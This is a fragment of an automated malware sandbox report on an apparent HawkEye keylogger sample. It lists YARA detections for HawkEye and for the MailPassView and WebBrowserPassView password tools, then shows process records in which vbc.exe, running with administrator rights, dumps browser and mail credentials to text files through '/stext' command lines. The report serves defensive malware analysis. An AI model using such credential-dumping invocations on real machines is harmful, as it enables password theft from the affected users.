• Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000000C.00000002.599637682.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: HKTL_NET_GUID_Stealer, Description: Detects c# red/black-team tools via typelibguid, Source: 0000000C.00000002.612974883.0000000007750000.00000004.00000001.sdmp, Author: Arnim Rupp
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000000C.00000002.606739235.0000000003B31000.00000004.00000001.sdmp, Author: Joe Security
Antivirus matches:
• Detection: 0%, Metadefender
• Detection: 0%, ReversingLabs
Reputation: moderate

General

Start time: 11:13:49
Start date: 27/07/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holderwb.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000012.00000002.493947169.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high

General

Start time: 11:13:49
Start date: 27/07/2021
Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext 'C:\Users\user\AppData\Local\Temp\holdermail.txt'
Imagebase: 0x400000
File size: 1171592 bytes
MD5 hash: C63ED21D5706A527419C9FBD730FFB2E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000013.00000002.491218277.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
Reputation: high
